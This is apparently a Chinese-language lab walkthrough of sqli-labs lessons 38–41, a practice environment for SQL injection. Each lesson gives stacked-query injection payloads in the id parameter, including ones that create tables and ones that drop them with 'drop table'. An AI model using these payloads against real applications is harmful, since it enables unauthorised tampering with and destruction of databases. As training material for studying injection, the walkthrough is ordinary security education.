sqli-labs Less38-Less41

　　?id=1

　　SELECT * FROM users WHERE id=‘1‘ LIMIT 0,1

 　　显示正常，id值被单引号包裹

　　加上单引号和注释符

　　?id=1‘ --+

（2）构造语句

　　?id=1‘; create table crow2 like users; --+

 　　执行成功

（3）在mysql命令行中查看

 　　插入成功

（4）删除刚创建的表

　　?id=1‘; drop table crow2; --+

 　　执行成功

 　　已成功删除

　　Lesson 38结束

Lesson 39  GET - Stacked Query injection - Intiger based

（1）先测试

　　?id=1

　　SELECT * FROM users WHERE id=1 LIMIT 0,1

 　　显示正常，id值没有被包裹

（2）直接构造语句

　　?id=1; create table crow like users;--+

 　　执行成功

（3）删除刚创建好的表

　　?id=1; drop table crow;--+

 　　执行成功

 　　成功删除

　　Lesson 39结束

Lesson 40  GET - Blind based - string - stacked

（1）先测试

　　?id=1 

　　SELECT * FROM users WHERE id=(‘1‘) LIMIT 0,1

 　　显示正常，id值被单引号和括号包裹

　　加上单引号和单括号 注释符

　　?id=1‘) --+

（2）构造语句

　　?id=1‘); create table crow lie users; --+

 　　创建成功

（3）删除表

　　?id=1‘); drop table crow; --+

 　　执行成功

 　　删除成功

　　Lesson 40结束

Lesson 41  GET - Blind based - Intiger - Stacked

（1）先测试

　　?id=1

　　SELECT * FROM users WHERE id=1 LIMIT 0,1

 　　显示正常，id值没有进行包裹

（2）加上单引号

　　?id=1‘

 　　没有任何回显

　　前几关，加上相应的会进行报错，所以证明这次的是盲注，只有输入正确的时候才会显示。不过不怎么影响接下来的操作。

（3）构造语句

　　?id=1; create table crow like users;--+

 　　创建成功

（4）删除表

　　?id=1; drop table crow;--+

 　　删除成功

　　Lesson 41结束

sqli-labs Less38-Less41

标签：ack   图片   users   mysql   执行   显示   img   from   测试